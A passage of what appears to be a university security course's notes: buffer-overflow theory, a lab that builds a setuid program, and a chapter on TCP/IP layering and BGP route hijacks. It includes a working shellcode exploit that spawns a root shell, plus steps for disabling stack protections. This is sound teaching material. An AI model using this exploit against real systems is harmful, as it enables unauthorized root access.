2. You've Been Hacked!
Back in Chapter 7, we noted that the very first major attack on DoD computer networks took place in February of 1998 and
lasted for over a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4
Navy sites, gaining access to logistical, administrative and accounting records. The method used in this early attack—a buffer
overflow—has been used countless times ever since. You have just witnessed this buffer overflow in your lab!
Recall that the buffer overflow entails overwriting a buffer in such a way that an executable program is placed in the stack
memory. Earlier in the course, we looked at a buffer overflow in general terms. In that earlier example, recalled in the picture
shown below, a buffer named alpha_code has been overwritten with an executable program that extends beyond the buffer
allotted for alpha_code.
The idea behind the illustration above is that we can overwrite additional stack items, including the return address, which is
stored on the stack. The key for the exploit to work is that the return address must be set to the address of alpha_code! If
we manage to set the return address to the address of alpha_code, then the return address is the address of the start of the
executable program.
Then, when the function is done executing, the return address will be retrieved and the executable code that the adversary
placed on the stack will start executing. Again, the exploit involves the adversary placing his own program in memory and
making it execute.
The program exploit_notesearch.c that you examined in lab simply generates a command string that runs the
bettersearchnote.exe program. The function named system will simply run its argument. So the function call
system(command);
will act as though the user typed in whatever is held in the string named command, and then hit return.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>    /* bzero */

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[])
{
    unsigned int i, *ptr, ret, offset=270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200);                          // zero out the new memory
    strcpy(command, "./bettersearchnote.exe \'");  // start command buffer
    buffer = command + strlen(command);           // set buffer at the end
    if(argc > 1)                                  // set offset
        offset = atoi(argv[1]);
    ret = (unsigned int) &i - offset;             // set return address
    for(i=0; i < 160; i+=4)                       // fill buffer with return address
        *((unsigned int *)(buffer+i)) = ret;
    memset(buffer, 0x90, 60);                     // build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
    strcat(command, "\'");
    system(command);                              // run exploit
    free(command);
    return 0;
}
This program will be explained in detail by a separate PowerPoint presentation.
Now, the string named shellcode contains machine language instructions to open a shell prompt.
This program executes ./bettersearchnote.exe and causes a buffer overflow that overwrites the return address,
pointing it at the machine instructions contained in shellcode. These instructions will open a shell. So... what's the big deal
you might ask? The problem is that when a user (any old user) executes bettersearchnote.exe they are running the
program as root because the setuid flag is set.
So... with the program running with elevated privileges, whose shell is opened? The answer: root's.
So, armed with a root shell, the hacker now has:
• full control of the system
• the ability to read anyone's files
• the ability to delete anyone's files
• the ability to install any software... including malware.
3. How is a Buffer Overflow Performed?
So...how would you perform a buffer overflow?
You would first attempt to see if this C flaw exists by entering a ridiculously long value (but one that you know) when prompted
to enter something, and you would check to see if that causes the program to behave erratically or crash with a segmentation
fault. This is an example of a technique known as “fuzz testing” or “fuzzing”. In general, fuzzing is the attempt to find soft
spots in a program.
If successful, you then can analyze the hex dump to see where your input string resides. You then use this info, plus the source
code (usually available for UNIX) to attempt to find where the return address is stored.
Crafting a buffer overflow attack is not easy. Hackers use two clever techniques to make the process a little more manageable.
Calling the contents inserted into the buffer the "payload", we can say that the payload has three sections:
• The desired return address is repeated many times at the end of the payload. Why the repetition? This gives the
hacker a number of chances to get the address correctly positioned in the return address field.
• The executable program (the exploit).
• A series of NOP instructions (assembly language "no operation" instructions). This series of NOPs is called the
"NOP sled". Why the NOP sled? It lets the hacker be a little bit off with the return address. The return address
just has to point anywhere within the NOP sled. Otherwise the return address would need to be the precise first
address of the exploit.
4. Defenses Against the Buffer Overflow Attack
How can we prevent a process from being exploited by a buffer overflow?
We mentioned one technique that would surely work: We could add code to the compiler to check the bounds on each and
every array reference (i.e., we can make the compiler responsible for ensuring data integrity). But this would significantly slow
down all programs, and so is not a solution at all—it would be akin to preventing injuries in automobile accidents by imposing
a national 5 MPH speed limit.
We can certainly minimize buffer overflow exploits by very careful coding. In the words of a former member of the NSA's
elite hacker unit (the Tailored Access Operations Division) the solution is straightforward: "The bottom line for preventing
buffer overflows is to ensure that bounds are checked before stuffing a string into an array or otherwise using it." The
programmer must realize that she is responsible for data integrity, and must be vigilant in testing and retesting all code for this
potential problem.
Several C library functions are notorious for inviting buffer overflow problems. In our EC310 class, the strcpy function is
a well-known culprit. The designers of C have, in fact, provided an improved version of this particular command—the
improved version, named strncpy, introduces some protection against writing beyond the end of an array. The format for
the strncpy command is
strncpy(destination_string , source_string , number_of_characters_to_copy)
The strncpy command's third argument is the number of characters to copy. The programmer can ensure, through the use
of this third argument, that we do not write beyond the bounds of the string destination_string.
The function scanf was also revised to permit the user to have some control of the total number of characters read in from
the keyboard.
The battle between hackers and programmers never ends. When hackers first started to take advantage of the fact that strcpy
copies a source string of any length into a buffer of fixed size, programmers responded by switching to strncpy.
Hackers quickly learned that if the source string is at least as long as the specified number of bytes to be copied, the
strncpy function does not append a terminating NUL to the copied string (strncpy was designed for fixed-width fields:
it pads the destination with NULs only when the source is shorter than the count). Thus, if the programmer does not terminate
the destination explicitly, a new set of hacks can be developed, based on the existence of strings sitting in memory without a
NUL terminator: every later strlen, printf or strcpy on such a buffer reads on past its end.
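To make the preceding two paragraphs concrete, here is an added example (not code from the EC310 notes) that takes the strcpy line from main in bettersearchnote.c, the strncpy replacement the text suggests, and the missing-terminator pitfall the text warns about, and puts them side by side. The buffer is 100 bytes like searchstring; the over-long source is constructed here as a stand-in for an over-long argv[1]. Each copy function takes the destination size explicitly so the bound is part of the interface rather than something the caller has to remember.

```c
#include <stdio.h>
#include <string.h>

#define SEARCH_LEN 100   /* sizeof searchstring in main of bettersearchnote.c */

/* 1 if dst[0..n-1] contains a NUL byte, i.e. dst is still a usable C string. */
int is_terminated(const char *dst, size_t n)
{
    return memchr(dst, '\0', n) != NULL;
}

/* The line from main: copies regardless of length, so a source of 100 or
 * more bytes runs off the end of dst. Shown for comparison; never called. */
void copy_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* strncpy alone: never writes past dst[n-1], but when strlen(src) >= n it
 * writes no terminator at all, leaving dst without a NUL. */
void copy_strncpy_only(char *dst, size_t n, const char *src)
{
    strncpy(dst, src, n);
}

/* The safe form: copy at most n-1 bytes and terminate explicitly.
 * Returns 1 if src fit, 0 if it was truncated, so the caller can reject it. */
int copy_bounded(char *dst, size_t n, const char *src)
{
    if (n == 0)
        return 0;
    strncpy(dst, src, n - 1);
    dst[n - 1] = '\0';
    return strlen(src) < n;
}

/* Fills buf with srclen 'A' bytes plus a NUL (buf must hold srclen+1 bytes):
 * a constructed stand-in for an over-long argv[1]. */
void make_long_arg(char *buf, size_t srclen)
{
    memset(buf, 'A', srclen);
    buf[srclen] = '\0';
}

/* After strncpy of a srclen-byte source (srclen < 300) into a SEARCH_LEN
 * buffer: is the buffer still a C string? */
int strncpy_leaves_terminator(size_t srclen)
{
    char src[300], dst[SEARCH_LEN];
    make_long_arg(src, srclen);
    memset(dst, 'Z', sizeof dst);       /* poison so a missing NUL is visible */
    copy_strncpy_only(dst, sizeof dst, src);
    return is_terminated(dst, sizeof dst);
}

/* Same source through copy_bounded: the resulting strlen, capped at
 * SEARCH_LEN-1 however long the source was. */
int bounded_result_len(size_t srclen)
{
    char src[300], dst[SEARCH_LEN];
    make_long_arg(src, srclen);
    copy_bounded(dst, sizeof dst, src);
    return (int)strlen(dst);
}

int main(void)
{
    printf("strncpy, 50-byte source, terminated?  %d\n", strncpy_leaves_terminator(50));
    printf("strncpy, 250-byte source, terminated? %d\n", strncpy_leaves_terminator(250));
    printf("bounded copy, 250-byte source, strlen: %d\n", bounded_result_len(250));
    /* copy_unchecked(dst, src) with the 250-byte source is the lab's bug and is
     * deliberately never executed here. */
    return 0;
}
```

With a 50-byte source strncpy pads the remaining 50 bytes with NULs and the result is a proper string; with a 250-byte source it fills all 100 bytes with 'A' and stops, and the poisoned buffer shows no terminator anywhere. copy_bounded always leaves a terminator and additionally tells the caller that truncation happened, which for a search string is usually the right moment to refuse the input rather than silently search for a shorter one.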
Beyond awareness and careful coding, several technical solutions have been proposed.
The non-executable stack. With this approach the operating system marks the memory pages holding the stack as
non-executable, and the processor refuses to fetch instructions from them. In effect the eip register is never permitted to
execute from an address in the stack's range: if a corrupted return address sends it there, the process faults instead of running
the adversary's code. Machine language instructions would not ordinarily be found on the stack (the machine language
instructions belong in the text section), so there is no legitimate reason for eip to ever point to the stack's region in memory.
It must be noted that this solution still poses some problems. First, it does not prevent a buffer overflow; rather, it prevents a
buffer overflow from following through with the execution of machine language instructions that were placed on the stack.
This approach does not protect against an adversary crashing our machine on a segmentation fault. Also, some highly
specialized applications actually depend on having executable code on the stack.
The canary. This approach entails placing a specific known value on the stack just prior to the return address. This known
value is termed a canary (since a canary was used in coal mines to provide an advance indication of danger). An attempt to
overwrite the return address will necessarily overwrite the canary. Before a function returns, the canary is checked to see if it
has been altered. If the canary has been altered, the program is halted.
Hackers have found ways to defeat the use of a canary. First, if a known canary is used (for example, if a canary of -1 is
always used), the hacker can perform a buffer overflow that overwrites the return address while making sure that the canary is
overwritten with the correct value (-1). If the programmer uses a pseudo-random canary, the hacker can attempt to read the
canary value as part of the exploit, taking care to overwrite it with that same value.
Address Space Layout Randomization (ASLR). In this technique, the stack and the heap are placed in random memory
locations, preventing the hacker from easily predicting the location of the return address. Of course the locations of the stack
and the heap are not completely random, but are usually arranged according to a fixed number of possible options. Starting
with Vista, Microsoft used ASLR with 256 different possible options for the stack-heap layout. A common counter-hack (not
covered in this class) involves using format string vulnerabilities to determine the return address location. Of course hackers
are also studying the various layout options and, eventually but certainly, hacks will be developed for each of the layout options.
Practice Problem 10.1
Briefly describe two technical solutions that have been proposed to prevent a program from being exploited by a buffer
overflow.
Solution:
Problems
1. Order these three main components of a buffer overflow exploit as they will appear on the stack:
   shellcode
   malicious return address
   nop sled
2. Aside from careful programming and the modification of several specific C commands, list and briefly describe two
technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
3. Explain why the buffer overflow described in this chapter is much more insidious than the buffer overflows described
in Chapter 7.
Security Exercise 10
Part I. Initial Conditions
To set up for this lab, carefully perform the following operations. Check off each step as you complete it. Let your instructor
or lab tech know if you encounter any problems.
1.
Navigate to your work directory by entering
cd work
In Lab 9 you used the program note2.c . Make sure that the program note2.c and its compiled machine code
version, note2.exe, are both still in your work directory by entering:
ls
You likely have additional files in your work directory—that's fine!
2. Recall that the program named note2.c allowed all your Company mates to send you notes. The program has
made you famous, and the root user would like to purchase it from you. He will pay you 25,000 Iranian rials for the
program. 25,000 is a big number, so of course you accept. Transfer ownership of the compiled program note2.exe to the
root user by entering:
sudo chown root:root ./note2.exe
Verify that you have successfully transferred ownership of the file note2.exe to the root user by entering
ls -l note2.exe
3. Now, the root user wants anyone to be able to execute the program note2.exe as though they were the root
user, so that anyone can leave notes in the file /tmp/notes . To give everyone the ability to write to the file
/tmp/notes in a very carefully controlled manner (only via the use of the program note2.exe) we must set the
setuid permission for the file note2.exe. To do this, enter:
sudo chmod u+s note2.exe
Verify that the setuid permission is enabled by entering
ls -l note2.exe
4. In class today we discussed the program bettersearchnote.c . This program has been written for you and
placed in the ec310code directory. Make sure you are at your home directory, then copy this file to the work directory
by carefully entering the following at the home directory prompt:
midshipman@EC310:~ $ cp ec310code/bettersearchnote.c work
Verify that you have bettersearchnote.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
5. We need to make one change to bettersearchnote.c . Open the file using nano:
nano bettersearchnote.c
and change the line in the function main that reads
fd = open( "/var/notes" , O_RDONLY );
to read
fd = open( "/tmp/notes" , O_RDONLY );
The only change is that var becomes tmp
Save the program (Control-o then Control-x)
6. Compile the program bettersearchnote.c as bettersearchnote.exe by entering:
gcc -o bettersearchnote.exe bettersearchnote.c
Make sure you now have bettersearchnote.exe in your work directory (enter ls).
(The exploit in Part IV relies on the stack being executable and on the absence of a stack canary, two of the defenses
described in Section 4 of this chapter; the course VM is assumed to be set up without them. On a system whose gcc turns
them on by default, the program would have to be compiled with -fno-stack-protector and -z execstack, and ASLR
would have to be disabled, for Part IV to behave as described.)
7. Transfer ownership of bettersearchnote.exe to the root user by entering
sudo chown root:root ./bettersearchnote.exe
and set the setuid permission on this program by entering
sudo chmod u+s bettersearchnote.exe
Verify that root owns the program and that the setuid permission is enabled by entering
ls -l bettersearchnote.exe
After all of these steps are completed, proceed to Part II.
By the time I was a First Lieutenant in the Marine Corps, I earned a Navy Cross, a Silver Star, two Bronze Stars and two
Purple Hearts. Can you guess who I am?
Part II. Adding Some Notes
Let's add some notes to the file /tmp/notes.
First, let's start fresh by removing any old version of /tmp/notes that might exist. Enter
rm /tmp/notes
If you get a message saying "No such file or directory", that's okay.
Now, let's say that the root user wants to add a note saying: "Notes for today:". To accomplish this, enter
sudo su root
./note2.exe "Notes for today:"
exit
Now, let's have joe enter the note "Parades stink". To accomplish this, enter:
sudo su joe
./note2.exe "Parades stink"
exit
Now, let's have matrix enter the note "What is for lunch?" To accomplish this, enter:
sudo su matrix
./note2.exe "What is for lunch?"
exit
Finally, let's have joe enter the note "Musters stink". To accomplish this, enter:
sudo su joe
./note2.exe "Musters stink"
exit
Now, go back to your work directory (you may be there already) and look at the file /tmp/notes by entering
cat /tmp/notes
It didn't let you see the notes!
Question 1. Why did the command cat /tmp/notes not let you see the notes?
Question 2. What command would you enter to view the file /tmp/notes ?
Enter your answer for Question 2 and show your instructor the contents of the file /tmp/notes. Then move on to Part III.
Part III. Using the Program bettersearchnote.exe
Recall that the program bettersearchnote.exe allows the user to view the notes that he has entered (and only the
notes that he has entered).
Suppose the user matrix wants to see the notes that she has left. Switch to user matrix:
sudo su matrix
and run the program as matrix:
./bettersearchnote.exe
Question 3. Did the program work as expected?
Return to the user midshipman by entering
exit
Now recall that the program bettersearchnote.exe allows the user to enter a search string as a command line
argument, and the program will then only print out messages left by the user that contain the specified search string.
Switch to user joe:
sudo su joe
and run the program as joe:
./bettersearchnote.exe
Question 4. What output did you obtain?
Now, run the program again, but giving a command line argument:
./bettersearchnote.exe "Must"
Question 5. What output did you obtain?
Return to the user midshipman by entering
exit
Switch to user root:
sudo su root
and run the program as root:
./bettersearchnote.exe
Question 6. What does root see when he runs the program?
Question 7. Why doesn't the root user see everyone's notes? He's root after all.
Return to the user midshipman by entering
exit
and proceed to Part IV.
Part IV. A Strange Occurrence
One of your friends has sent you a note:
"Here is a great program named exploit_notesearch.c . Try it out."
In the booksrc directory, there resides a file named exploit_notesearch.c.
Change to your home directory by entering
cd
From your home directory (make sure you are at your home directory!), copy this file by entering
midshipman@EC310:~ $ cp booksrc/exploit_notesearch.c work
Verify that you have exploit_notesearch.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
If you do not have exploit_notesearch.c in your work directory STOP and ask your instructor or lab tech for
assistance. Otherwise, continue.
We have to make one change to this program. Open this program for editing using nano:
nano exploit_notesearch.c
and change the line that reads
strcpy(command, "./notesearch \'"); // start command buffer
to read
strcpy(command, "./bettersearchnote.exe \'"); // start command buffer
Note that this says bettersearchnote , not betternotesearch ! Add the .exe to the end!
Save the program (Control-o then Control-x)
Compile the program exploit_notesearch.c by entering
gcc exploit_notesearch.c
and execute the program by entering
./a.out
Question 8. What shocking event just happened?
Question 9. Enter whoami. What is the reply?
The programs used in this security exercise are adapted from programs presented in Hacking, The Art of Exploitation, No
Starch Press, 2008.
Security Exercise 10 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Part II: The Network
You are now experts on the security of an individual host.
Well−okay−expert-ish.
In this module you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure
really is. You will learn about the fundamental networking technologies and the design principles behind the Internet, and you
will examine the security risks associated with internetworking.
Chapter 11: The TCP/IP Model
Objectives:
(a) Describe the TCP/IP model, the functions performed by each layer, and the process of encapsulation.
(b) Define the function of a protocol.
EC310 is divided into three sections. We finished Part I: The Host, where we examined specific threats against an individual
computer in isolation from a network, focusing on the buffer overflow attack.
We now move on to Part II: The Network, where you will gain an in-depth understanding of how the Internet works today and
how fragile its core infrastructure really is.
After we complete the network section, we will move to our final unit, Part III: Wireless, where you will gain an appreciation
for the unique security threats inherent when operating in a wireless environment.
(Graphic by Dane Brown and Jennie Wood)
I. An Example of Network Fragility
The Internet was actually designed in the 1970s, long before its security became a concern. As the Internet's protocols were
being put in place, the underlying assumption was that the Internet would only be used by cooperating scientists and academics
who had no reasons to act with malice toward each other. Since security was not an issue, many of the underlying Internet
protocols, to this day, rely on a measure of trust and cooperation among the parties that regulate and control the Internet's
infrastructure.
This is particularly true when routing traffic through the Internet. It should be obvious that it is beneficial to route traffic from
source to destination using the best path. It would not make sense to route Internet traffic from Boston to New York via Tokyo.
The decisions concerning which routes are best for reaching various destinations are largely determined through cooperation
among the Internet's routers. Basically, each router tries to determine how easily it can get to various particular destinations,
and the routers exchange this information with each other. Through this cooperative exchange, a consensus emerges over
which routes are optimal to reach specific destinations from any starting point.
So, with so much cooperation, what could go wrong?
In 2008, A Dutch politician named Geert Wilders released a three and a half minute trailer for a controversial short film that
explored the ties between Koranic teachings and terrorism. The trailer and the film (which was subsequently released in 2009)
were both critical of Islam and created an uproar in many Muslim-dominated countries. The film trailer also caused an uproar
that reverberated throughout the global Internet.[17]
Pakistanis marched through Karachi to protest the video. In response, the Pakistani government ordered that YouTube be
blocked in all of Pakistan to prevent Pakistani citizens from viewing the offending movie trailer.
On Sunday, February 24th, 2008, Pakistan Telecom, the national ISP, complied with the order to block YouTube by advertising
itself to the rest of the world as the best route to reach YouTube. In essence, Pakistan Telecom announced to the all other
routers on the Internet: "If you want to reach YouTube, I can get you there nearly instantaneously—so if you want to get to
YouTube quick, forward your request to Pakistan Telecom." A man trying to access YouTube from his home in Karachi had
his request routed to Pakistan Telecom instead.
But the repercussions extended far beyond the borders of Pakistan. The Internet's routers—throughout the world—assuming
that the information was truthful, autonomously adjusted their optimal route to YouTube by sending all worldwide YouTube
requests to Pakistan Telecom. Because of the level of trust among the Internet's key players, no verification was made to check
if the new route made any sense. Pakistan Telecom—needless to say—simply discarded these requests from people around
the world wanting to get to YouTube. Instead of the usual cat videos or clips of old people falling down the stairs, viewers
were greeted with this far less entertaining display:
It should be noted that subsequent investigations revealed that Pakistan Telecom only intended to block YouTube within
Pakistan; they did not foresee that their actions would affect the broader Internet. Also, Pakistan Telecom did not disrupt the
correct routing information that was all-the-while promulgated by YouTube's servers and Internet routers; it simply
promulgated "better" routing information.
In any event, the YouTube outage affected the world and lasted for over two hours.
In a similar incident, on Christmas Eve in 2004, a company in Turkey inadvertently announced that it was the best path to
everything on the Internet. A report by Todd Underwood of the Internet Management firm Renesys concluded that "Virtually
everything on the Internet was unreachable for someone: banks, governments, ecommerce sites, businesses, universities–no
one escaped the damage." This event lasted several hours.
[17] The interested midshipman can view the controversial movie trailer here:
http://www.youtube.com/watch?v=jKCZfnpU1uc
Worldwide availability of YouTube drops from 100% to 0% for an hour,
and does not fully recover for over two hours. (Source: Keynote Systems)
Likewise, in an event that one can only assume was accidental, Con Edison—the electric company for New York City—
announced that it was the best route to reach Martha Stewart Living Omnimedia. For several hours, individuals who wanted
to check on the right color salad bowl to use at a springtime picnic were routed to the gritty website of a public service utility.
This is a problem affecting the Internet right now. The ease with which a hacker can manipulate routing tables to intercept or
redirect Internet traffic remains startling. In November 2013, Renesys noted that on 38 distinct occasions over the period
February 2013-November 2013, Internet traffic affecting major financial institutions and government agencies was inexplicably
routed through Belarus. The graph below shows the route taken by a banking transaction between New York and Los Angeles
that was mysteriously routed through Belarus.
These routing calamities are not limited to the US. On Tuesday January 21, 2014, most of China's 500 million Internet users
had all of their Internet traffic redirected to a nondescript residential building in Cheyenne, Wyoming. In short, China was cut
off from the Internet for about eight hours.
What would happen if an Internet Service Provider for Iran announced it had the best route to the US DoD?
More to the point: Why does the Internet work this way? For the next five weeks we will pull apart the infrastructure of this
mysterious creature called the Internet.
II. Layers
1. Divide and Conquer. Computer networks are exceedingly complex. To enable effective communication we must attempt
to coherently organize the various functions that must be carried out. To reduce the complexity in designing networks, and to
make the task more manageable, networks are organized as a series of layers. The guiding principles are:
 Each layer performs only a few specific, well-defined functions. This simplifies the design.
 The layers are built, one on top of the next.
 Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer
above. This permits later modifications. A single piece of software that provides all networking capability would be
very hard to modify later.
This notion of organizing a network into a series of layers is similar (conceptually) to the way that programs are organized into
a series of modular functions.
2. Example.
Suppose you want to send an email to your friend. You have email application software on your computer, and your friend has
email application software on her computer. Thus, you can compose an email on your computer using your application, and if
this email was to land at the doorstep of the email application on your friend's computer, she could then read it. But… how
does this email get from your email application program to your friend's email application program? They are separated by a
geographic distance.
You have no idea of how to proceed in getting your email from the email application on your computer to the email application
on your friend's computer, so you consult with your friend, the Transport layer.
You don't recall when your friend Transport became so verbose, but you decide to leave your problem with him.
Although your friend Transport was willing to help, and has taken custody of your email message, he quickly realizes he cannot
proceed. Not knowing what to do, he contacts his friend, the Network layer.
You wonder about why your friend Network used so many words to say "I can't help you, but I'll see what I can do", but you—
Transport—decide to leave your problem (which was actually Application's problem) with your friend Network.
Although your friend Network was willing to help, and has taken custody of the email message, he quickly realizes he cannot
proceed. Not knowing what to do, he contacts his friend, the Data Link layer.
You wonder about why your friend Data Link is such a blabbermouth, but you—Network—are happy you do not have to deal
with Rickover Hall personnel, so you leave the email with your friend Data Link.
Although your friend Data Link was willing to help, and has taken custody of the email message, he quickly realizes he needs
his friend, the Physical Layer, to help.
You wonder about why your friend Physical is such a Debbie Downer, but then you remember—all those years in the basement
of Rickover!—and you're just happy to get the message to him (and off your desk).
But here is the important point: The physical layers are able to successfully communicate:
So, the original email leaves the email application on the left, travels down the five layers (Application, Transport, Network,
Data Link and Physical), then travels across a physical medium, landing at the destination computer. At the destination
computer the message transits up the five layers, eventually arriving at the email application of your friend's computer, on the
right.
In light of the picture above, recall the guiding principles we mentioned at the outset:
 Each layer performs only a few specific, well-defined functions. This simplifies the design. For example, in the email
scenario above, the transport layer only worried about getting the message delivered to the right application (the email
application) and having it arrive correctly. The transport layer did not worry about routing (that was left to the network
layer) or whether logical one should be represented by +5 volts (that was left to the physical layer).
 The layers are built, one on top of the next.
 Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer
above. This permits later modifications. For example, the network layer is tasked with determining the best route
from source to destination, but the choice of algorithm used should be of no consequence to the transport layer. If we
were to change the network layer routing algorithm from a link-state algorithm to a distance-vector algorithm, the
transport layer should not even be aware of this.
If we decided to try to build one big honking software/hardware contraption that does everything at once (i.e., just put the whole
kit and kaboodle into one layer), the resulting mess would be extremely difficult to modify later. Splitting functions into layers
simplifies the design. Additionally, it allows us to replace a layer with a different implementation that accomplishes the same
task using a different mechanism, without disturbing the other layers.
3. Protocols. It is important to note that actual communication takes place only between the five layers in the same machine
and the physical layers of adjacent machines. In the picture on the preceding page, the dark black lines signify the only true
transfer of data—i.e., the only real communication. Apart from the physical layer, no data are actually directly transferred from
layer n on one machine to layer n on the other machine. Instead, each layer passes information/data only to the layer
immediately above or below it.
In a real sense, though, it seems as if the email application in the machine on the left in the picture above is communicating
directly with the email application in the machine on the right. Similarly, it seems as if the transport layer on the left is
communicating directly with the transport layer on the right. In fact, it seems as if each layer on the left is communicating with
its peer layer on the right. This communication is termed virtual communication.
A layer in one machine communicates with the corresponding layer on the other machine using that layer's protocol. For
example, the transport layer of the machine on the left communicates with the transport layer of the machine on the right using
the transport layer protocol.
A protocol is an agreement or a set of rules governing how a task or process should be carried out. We mentioned that one of
the functions of the transport layer is to ensure that data is delivered without errors. The transport layers on both machines
might, for example, use the Hamming code to ensure that errors are detected and corrected. In this case, the agreed upon
protocol for error detection at the transport layer is the Hamming code. If the transport layer in the machine on the left is using
the Hamming code to detect errors, but the machine on the right is using the CRC algorithm to detect errors, communication
will not be successful. The peer entities at each layer must agree on the protocol.
As another example, we mentioned that one of the functions of the physical layer is to determine how logical 1 and logical 0
are represented. If the physical layer of the machine on the left is representing logical one by +5 volts and logical zero as -5
volts, but the machine on the right is doing just the opposite—representing logical one as -5 volts and logical zero as +5 volts—
communication will not be successful. The peer entities at each layer must agree on the protocol.
To recap, two machines might be connected, but if a protocol is not in place at each layer, there will be no communication. If
two people are talking to (at) each other, one who only speaks English and the other who speaks only Chinese, no successful
communication will occur because the two speakers are not using the same protocol (in this case, the language). If agreed upon
protocols are in place, then the entities on the same layers on different machines (i.e., peer entities) carry on a conversation
using the agreed-upon protocol.
Some additional jargon to impress your date:
 Network Architecture. The set of layers and protocols is termed a network architecture.
 Protocol Stacks. The protocols used by a system are called the system's protocol stack.
4. Tanenbaum's Philosopher Analogy.[18] The various terms—layers, protocols, virtual communication, etc.—may seem
confusing, so let's use these same concepts in a non-networking setting. Two philosophers wish to communicate, but they are
far apart and they don’t speak the same language. So they each hire a translator who translates their messages into a common
language. The translators then pass their messages along through secretaries, who can communicate through a common
interface. Note that it doesn’t matter what the common interface is (fax, phone, e-mail) as long as both secretaries use the same
interface. Similarly, it doesn’t matter what the common language is (Dutch, English, Swahili) as long as the translators agree.
Also, note that neither the secretaries nor the philosophers need know what the language choice was. Just like the philosophers
and the translators don’t need to know how the message is transmitted. Each layer just needs to understand its interface to the
next layer.
Figure 1. Tanenbaum's Philosopher Analogy. From Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall,
2003
[18] See: Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall, 2003 (pages 28-29)
So… how many layers exist in this scheme? You should agree that we have three layers, which we might call the Philosopher
Layer, the Translator Layer and the Secretary Layer.
Entities at the same layer must use the same protocol, or communication will not be successful. If the translator on the left
translates messages into French while the translator on the right is expecting to receive messages in German, no deep
philosophical thoughts will be exchanged between the philosophers. If the secretary on the left sends messages by fax, but the
secretary on the right is only expecting messages by email, no philosophical thoughts will be shared.
Think about how layering helps us in this scenario. We can easily replace a layer with a different implementation that
accomplishes the same task using a different mechanism, without disturbing the other layers. For example, the two translators
might shift from Latin to Hebrew. As long as the two translators agree, the philosophers and secretaries will not be concerned
(they might not even be aware of the shift in the language protocol). Similarly, the two secretaries might agree to shift from
the fax protocol to the email protocol without even informing the translators or philosophers.
5. Encapsulation. So think again… how does a layer do its job? Here's how:
 At the sending end, each layer puts a header on the message received from the layer above. The header contains
information necessary for the protocol to do its job.
 At the receiving end, each layer strips off the corresponding header and forwards the rest up to the layer above.
The application layer passes its message to the transport layer. The transport layer attaches some number of bits, shown as T
in the picture above and sends this onward to the network layer. The network layer then appends some number of bits, shown
as N in the picture above, and so on, down the protocol stack. What actually gets transmitted across the physical layer from
the source to the destination is:
Now, this arrives at the destination.
The destination physical layer removes the bits marked P and passes the result up to the data link layer. The data link layer
removed the bits marked D and uses these bits to implement the data link protocol. Then the result is passed to the network
layer which removes the bits marked N and uses these bits to implement the network layer protocol, and so forth.
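To make the header-on, header-off mechanics concrete, here is an added example, written for these notes rather than taken from the EC310 materials: a toy three-protocol stack in Python. The transport header carries a length and a checksum, the network header carries source and destination addresses, and the data link layer cuts the packet into frames of at most 256 bytes, each with a sequence header and a CRC-32 trailer. The header formats, the 256-byte frame limit and the addresses are constructed for illustration; each receiving layer uses only its own header bits and then hands the rest upward, exactly as the text describes.

```python
import struct
import zlib
from typing import List, Optional

# Toy header formats for this example (constructed; not any real protocol's layout).
T_HDR = struct.Struct("!HH")      # transport: message length, 16-bit checksum
N_HDR = struct.Struct("!4s4s")    # network: source address, destination address
D_HDR = struct.Struct("!HH")      # data link: frame sequence number, total frame count
D_TRL = 4                         # data link trailer: CRC-32 over header + data
FRAME_MAX = 256                   # largest frame the toy link accepts, in bytes


def _checksum(data: bytes) -> int:
    """End-to-end error check used by the toy transport protocol."""
    return sum(data) & 0xFFFF


def send(message: bytes, src: bytes, dst: bytes) -> List[bytes]:
    """Sending side: the message goes down the stack; returns the frames put on the wire."""
    # Transport layer prepends T; network layer prepends N.
    segment = T_HDR.pack(len(message), _checksum(message)) + message
    packet = N_HDR.pack(src, dst) + segment
    # Data link layer splits the packet so header + chunk + trailer fits in one frame,
    # prepending D and appending the CRC to each piece.
    room = FRAME_MAX - D_HDR.size - D_TRL
    chunks = [packet[i:i + room] for i in range(0, len(packet), room)]
    frames = []
    for seq, chunk in enumerate(chunks):
        body = D_HDR.pack(seq, len(chunks)) + chunk
        frames.append(body + struct.pack("!I", zlib.crc32(body)))
    return frames


def receive(frames: List[bytes], my_addr: bytes) -> Optional[bytes]:
    """Receiving side: each layer strips and uses its own header, then passes the rest up."""
    pieces = {}
    count = 0
    for frame in frames:                                   # data link layer
        body, fcs = frame[:-D_TRL], struct.unpack("!I", frame[-D_TRL:])[0]
        if zlib.crc32(body) != fcs:
            continue                                       # damaged frame is discarded
        seq, count = D_HDR.unpack_from(body)
        pieces[seq] = body[D_HDR.size:]
    if count == 0 or len(pieces) != count:
        return None                                        # a frame is missing
    packet = b"".join(pieces[i] for i in range(count))
    src, dst = N_HDR.unpack_from(packet)                   # network layer
    if dst != my_addr:
        return None                                        # not addressed to this host
    segment = packet[N_HDR.size:]
    length, cksum = T_HDR.unpack_from(segment)             # transport layer
    message = segment[T_HDR.size:T_HDR.size + length]
    if len(message) != length or _checksum(message) != cksum:
        return None                                        # end-to-end error detected
    return message                                         # delivered to the application


def wire_stats(message: bytes,
               src: bytes = b"\x0a\x00\x00\x01",
               dst: bytes = b"\x0a\x00\x00\x02") -> dict:
    """How many frames a message needs and how many bytes actually cross the physical layer."""
    frames = send(message, src, dst)
    total = sum(len(f) for f in frames)
    return {"frames": len(frames), "bytes_on_wire": total,
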